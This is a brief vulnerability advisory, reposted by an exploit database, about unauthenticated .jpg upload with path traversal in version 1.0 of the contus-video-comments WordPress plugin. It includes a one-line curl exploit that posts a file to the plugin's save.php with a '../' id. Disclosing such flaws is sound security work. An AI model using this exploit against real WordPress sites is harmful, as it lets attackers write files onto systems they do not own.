Title: Unauthenticated remote .jpg file upload in contus-video-comments v1.0 wordpress plugin Author: Larry W. Cashdollar, @_larry0 Date: 2016-06-15 Download Site: https://wordpress.org/plugins/contus-video-comments/ Vendor: https://profiles.wordpress.org/hdflvplayer/ Vendor Notified: 2016-06-16 Vendor Contact: Description: Video comments integrated with the standard comment system of wordpress. Vulnerability: The following code allows any user to upload .jpg files to the WordPress installation. It also allows path traversal with ../. CVE-TBD Exploit Code: • $ curl --data @image.jpg "http://wp-site/wp-content/plugins/contus-video-comments/save.php?id=../image" # Iranian Exploit DataBase = http://IeDb.Ir [2016-07-21]